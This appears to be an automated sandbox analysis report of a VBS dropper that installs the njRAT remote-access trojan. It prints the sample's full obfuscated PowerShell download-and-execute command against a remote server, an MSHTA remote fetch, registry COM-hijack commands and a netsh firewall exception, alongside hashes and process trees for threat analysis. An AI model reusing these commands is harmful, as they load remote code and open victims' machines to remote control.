Analysis
-
max time kernel
144s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 19:00
Static task
static1
Behavioral task
behavioral1
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win10v2004-20220722-en
General
-
Target
LIYDOERWQPOKERHAVAXOCI.vbs
-
Size
1KB
-
MD5
733afa01e2447e2fcafcf4f224a1a4a7
-
SHA1
fcb94d8e29aa8bb802104a6ea49f7e715bea7031
-
SHA256
00eb25d6c95f74f9c7caded04eca76fa2a03e280448af51c1108b75b2709909a
-
SHA512
42658d2f4cbb0a75c49434644078ad5291995b415481186a66aad1fd31a3013002e6f753093f81c4d8022a7811b199e2b66270c4017a928f6bf9df72d0334948
Malware Config
Extracted
https://tradeguru.com.pk/enc1
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXEPOWERSHELL.exePOWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4812 3496 MSHTA.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2316 3496 POWERSHELL.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 3496 POWERSHELL.exe -
Blocklisted process makes network request 3 IoCs
Processes:
MSHTA.EXEPOWERSHELL.exeflow pid process 16 4812 MSHTA.EXE 18 4812 MSHTA.EXE 24 2316 POWERSHELL.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3520 set thread context of 2380 3520 powershell.exe aspnet_compiler.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exepid process 2316 POWERSHELL.exe 2316 POWERSHELL.exe 2392 powershell.exe 2392 powershell.exe 2992 POWERSHELL.exe 2992 POWERSHELL.exe 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 2316 POWERSHELL.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2992 POWERSHELL.exe Token: SeIncreaseQuotaPrivilege 2392 powershell.exe Token: SeSecurityPrivilege 2392 powershell.exe Token: SeTakeOwnershipPrivilege 2392 powershell.exe Token: SeLoadDriverPrivilege 2392 powershell.exe Token: SeSystemProfilePrivilege 2392 powershell.exe Token: SeSystemtimePrivilege 2392 powershell.exe Token: SeProfSingleProcessPrivilege 2392 powershell.exe Token: SeIncBasePriorityPrivilege 2392 powershell.exe Token: SeCreatePagefilePrivilege 2392 powershell.exe Token: SeBackupPrivilege 2392 powershell.exe Token: SeRestorePrivilege 2392 powershell.exe Token: SeShutdownPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeSystemEnvironmentPrivilege 2392 powershell.exe Token: SeRemoteShutdownPrivilege 2392 powershell.exe Token: SeUndockPrivilege 2392 powershell.exe Token: SeManageVolumePrivilege 2392 powershell.exe Token: 33 2392 powershell.exe Token: 34 2392 powershell.exe Token: 35 2392 powershell.exe Token: 36 2392 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeIncreaseQuotaPrivilege 2392 powershell.exe Token: SeSecurityPrivilege 2392 powershell.exe Token: SeTakeOwnershipPrivilege 2392 powershell.exe Token: SeLoadDriverPrivilege 2392 powershell.exe Token: SeSystemProfilePrivilege 2392 powershell.exe Token: SeSystemtimePrivilege 2392 powershell.exe Token: SeProfSingleProcessPrivilege 2392 powershell.exe Token: SeIncBasePriorityPrivilege 2392 powershell.exe Token: SeCreatePagefilePrivilege 2392 powershell.exe Token: SeBackupPrivilege 2392 powershell.exe Token: SeRestorePrivilege 2392 powershell.exe Token: SeShutdownPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeSystemEnvironmentPrivilege 2392 powershell.exe Token: SeRemoteShutdownPrivilege 2392 powershell.exe Token: SeUndockPrivilege 2392 powershell.exe Token: SeManageVolumePrivilege 2392 powershell.exe Token: 33 2392 powershell.exe Token: 34 2392 powershell.exe Token: 35 2392 powershell.exe Token: 36 2392 powershell.exe Token: SeIncreaseQuotaPrivilege 2392 powershell.exe Token: SeSecurityPrivilege 2392 powershell.exe Token: SeTakeOwnershipPrivilege 2392 powershell.exe Token: SeLoadDriverPrivilege 2392 powershell.exe Token: SeSystemProfilePrivilege 2392 powershell.exe Token: SeSystemtimePrivilege 2392 powershell.exe Token: SeProfSingleProcessPrivilege 2392 powershell.exe Token: SeIncBasePriorityPrivilege 2392 powershell.exe Token: SeCreatePagefilePrivilege 2392 powershell.exe Token: SeBackupPrivilege 2392 powershell.exe Token: SeRestorePrivilege 2392 powershell.exe Token: SeShutdownPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeSystemEnvironmentPrivilege 2392 powershell.exe Token: SeRemoteShutdownPrivilege 2392 powershell.exe Token: SeUndockPrivilege 2392 powershell.exe Token: SeManageVolumePrivilege 2392 powershell.exe Token: 33 2392 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 2316 wrote to memory of 2392 2316 POWERSHELL.exe powershell.exe PID 2316 wrote to memory of 2392 2316 POWERSHELL.exe powershell.exe PID 2392 wrote to memory of 2008 2392 powershell.exe WScript.exe PID 2392 wrote to memory of 2008 2392 powershell.exe WScript.exe PID 2992 wrote to memory of 3052 2992 POWERSHELL.exe cmd.exe PID 2992 wrote to memory of 3052 2992 POWERSHELL.exe cmd.exe PID 3052 wrote to memory of 2376 3052 cmd.exe reg.exe PID 3052 wrote to memory of 2376 3052 cmd.exe reg.exe PID 3052 wrote to memory of 4468 3052 cmd.exe reg.exe PID 3052 wrote to memory of 4468 3052 cmd.exe reg.exe PID 3052 wrote to memory of 4768 3052 cmd.exe cmd.exe PID 3052 wrote to memory of 4768 3052 cmd.exe cmd.exe PID 4768 wrote to memory of 3520 4768 cmd.exe powershell.exe PID 4768 wrote to memory of 3520 4768 cmd.exe powershell.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 3520 wrote to memory of 2380 3520 powershell.exe aspnet_compiler.exe PID 2380 wrote to memory of 2456 2380 aspnet_compiler.exe netsh.exe PID 2380 wrote to memory of 2456 2380 aspnet_compiler.exe netsh.exe PID 2380 wrote to memory of 2456 2380 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"1⤵
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc11⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<[email protected]@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$tR3=#_^2&^&=4$[-(8[8$ #127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server1.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.batFilesize
706B
MD51a7a326391b638c03d76369946fc0052
SHA17ae0ffd77ec76b94d735265efad35ddd072cdf36
SHA2560223739ebea16b1f70bf88f3eb43afd01c315c1e7142a72bf8931bb6be9ea09f
SHA512449ce3c15d2d36e42c00c9f9b1df759aa830de931532ee17d16ff6b50a8fe3d180ae474e2e8aca66e9af47df434293f3d96367dedaa91ad1ce60383fe23f9495
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1Filesize
3KB
MD589879c7e1b80b9171b57ec7290c50cf8
SHA14d2761deb7c46b99f5c8ebc4329f0ccd5b3aace3
SHA256dc8f58abd89fed28b00f23da6657188e40dde2da65c254c12a38c4ed1984c6b2
SHA512d8f579f01ddba32beb1cc578fd798b6e8790073261fdd71c4b5b0a277766a68833ca5834b006e9e9c3582f2476fa77b8019e98f744dafdf56f9e0239afe1dd3b
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbsFilesize
1KB
MD577d9ab54d90a588d38b4a402d7cf25bb
SHA1f72cf4ad3106815b8f3dc9ab804ae285b6bad1e6
SHA25625f09c56e34e4a61e8e57e453c2a3ed05ff33b6e10f1d78af94301ddf312a9f4
SHA512c2054a0e6df593a318fd310b82ed43cb8cf8f89b58bd784acd3ec5ca2a7b039f7fc2848a7641cc43215c0656ea71d3a09ed800d0164c293e5b54bbd27ffe21e6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD551aa87521f685fa8d4f4bdbd7684a350
SHA1fd4027d9b24c41461525b0f3f764aa6b2ddd5803
SHA2566e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6
SHA512637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5171c8388c36c7ff24bff6d83366bcbd6
SHA1b457641f8c88a56590921ce729d3111a8964107a
SHA256cbb779c4ad16523953107fa4344f29750fd398216b1769ad9476c43ebe919621
SHA51294889b43df68c6fd761e946a220a7deea68318d9685ffe6c42926e647bbf1f3ef650a1c7dc7e7ffe66e4f02c97a32d4105502c9c8835e14795dcd85088b60e99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
memory/2008-139-0x0000000000000000-mapping.dmp
-
memory/2316-134-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/2316-133-0x0000021EFFC20000-0x0000021EFFC42000-memory.dmpFilesize
136KB
-
memory/2316-135-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/2316-153-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/2376-143-0x0000000000000000-mapping.dmp
-
memory/2380-154-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/2380-165-0x0000000006010000-0x000000000601A000-memory.dmpFilesize
40KB
-
memory/2380-164-0x0000000006650000-0x00000000066B6000-memory.dmpFilesize
408KB
-
memory/2380-161-0x00000000060A0000-0x0000000006644000-memory.dmpFilesize
5.6MB
-
memory/2380-162-0x0000000005AF0000-0x0000000005B82000-memory.dmpFilesize
584KB
-
memory/2380-160-0x0000000005990000-0x0000000005A2C000-memory.dmpFilesize
624KB
-
memory/2380-155-0x000000000040BBBE-mapping.dmp
-
memory/2392-150-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/2392-136-0x0000000000000000-mapping.dmp
-
memory/2392-137-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/2456-163-0x0000000000000000-mapping.dmp
-
memory/2992-147-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/2992-159-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/3052-141-0x0000000000000000-mapping.dmp
-
memory/3520-157-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/3520-148-0x00007FFB07940000-0x00007FFB08401000-memory.dmpFilesize
10.8MB
-
memory/3520-146-0x0000000000000000-mapping.dmp
-
memory/4468-144-0x0000000000000000-mapping.dmp
-
memory/4768-145-0x0000000000000000-mapping.dmp